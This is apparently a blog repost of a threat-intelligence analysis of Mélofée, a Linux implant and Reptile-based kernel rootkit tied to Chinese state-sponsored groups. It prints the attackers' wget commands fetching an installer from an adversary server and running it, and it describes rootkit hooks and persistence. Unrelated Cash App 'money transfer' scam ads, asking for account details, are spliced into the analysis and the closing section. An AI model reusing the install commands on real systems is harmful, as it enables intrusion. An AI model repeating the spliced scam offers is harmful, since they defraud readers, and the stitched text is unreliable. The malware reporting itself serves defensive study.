Mélofée – New Linux Malware Linked to Chinese APT Groups

A new piece of malware targeted at Linux servers has been connected to an unidentified Chinese state-sponsored hacking organization.

ExaTrack, a French cybersecurity company, discovered three examples of the previously reported malicious software in early 2022 and gave it the name Mélofée.

Mélofée implant analysis

We found three samples of this malware family, which we dubbed Mélofée.

Two of these samples included a version number (2022011120220308), and we assess that the last sample was likely dated from late April or May 2022.

All these samples shared a common code base, but showed a constant development in the following domains:

  • evolutions of the communication protocol and the packet format
  • change in the encryption of the configuration, using first RC4 and then a simple xor
  • the development of a SelfForwardServer functionality
  • lastly, the inclusion of a kernel mode rootkit in the last sample.


The first sample we found dropped a rootkit based on a modified version of the open source projet Reptile 1.

According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64. The rootkit has a limited set of features, mainly installing a hook designed for hiding itself.

The rootkit hooks the functions fillonedirfilldir and filldir64 in order to not display files with names containing intel_audio or rc.modules when listing a directory.


Get Legit Cash App Money Transfer  Now

What you can achieve with our Cashapp transfer service is unlimited unless you don’t know how to do business or probably spend money.


  • Cashtag $name
  • Cashapp Email
  • Cashapp Account Holder’s Full Name (To help us send with description to the holder)
  • Let us know of any specific instructions you will want us to add to your transfer, but if there are none then we will handle it

It also hooks the inet_ioctl function in order to be able to communicate with its userland part using the ioctl system call. The kernel rootkit expects the userland component to send a value of 0xe0e0e0e during the IOCTL call, with 2 commands supported (these two commands being hide and show).

The rootkit is loaded both by the installer and server components with a call to the insmod utility.


The implant and the rootkit were installed using shell commands downloading both the installer and a custom binary package from an adversary controlled server. This behaviour is similar to the installation process of Winnti Linux rootkits.

wget http://173.209.62[.]186:8765/installer -O /var/tmp/installer
wget http://173.209.62[.]186:8765/a.dat -O /var/tmp/usbd;
chmod +x /var/tmp/installer;
/var/tmp/installer -i /var/tmp/usbd

The installer is also developped in C++, and takes the binary package as an argument. It then then proceeds to extract and install both the rootkit and the server component. The rootkit and implant paths are hardcoded to respectively /etc/intel_audio/intel_audio.ko and /etc/intel_audio/audio The installer inserts the kernel rootkit using a call to system("insmod /etc/intel_audio/intel_audio.ko"), and also install the persistence in the /etc/rc.modules file.

Writing to this script ensures that both kernel and implant are executed at boot time2.

One of the artifacts is made to unload a kernel-mode rootkit that is built on the Reptile open source project.

“According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64,” the company said in a report. “The rootkit has a limited set of features, mainly installing a hook designed for hiding itself.”

It is claimed that the installer and a unique binary package are downloaded from a remote server by shell instructions that are used to distribute both the implant and the rootkit.

The rootkit and a live server implant module are both extracted by the installer after it receives the binary package as an argument.

The capabilities of Mélofée, which enable it to communicate with a remote server and obtain instructions that permit it to operate on files, create sockets, run a shell, and issue arbitrary commands, are identical to those of other backdoors of its kind.

The malware’s ties to China come from infrastructure overlaps with groups such as APT41 (aka Winnti) and Earth Berberoka (aka GamblingPuppet).

Earth Berberoka is the name given to a state-sponsored actor chiefly targeting gambling websites in China since at least 2020 using multi-platform malware like HelloBot and Pupy RAT.

According to Trend Micro, some samples of the Python-based Pupy RAT have been concealed using the Reptile rootkit.


Also discovered by ExaTrack is another implant codenamed AlienReverse, which shares code similarities with Mélofée and makes use of publicly-available tools like EarthWorm and socks_proxy.

The firm claimed that the “Mélofée implant family is yet another weapon in the toolbox of Chinese state-sponsored attackers, which show constant innovation and development.”

“Despite being comparatively straightforward, Mélofée’s capabilities could allow adversaries to carry out their attacks covertly. The fact that these implants were not frequently observed indicates that the assailants are probably only using them on high-value targets.

Click Here to Get Legit Cash App Money Transfer


Get $500 Cashapp Get $750 Cashapp | Get $1k Cashapp | Get $2k Cashapp Get $5k Cashapp  | Get $4k CAshapp 

cashapp flip legit store

Leave a Comment

Your email address will not be published. Required fields are marked *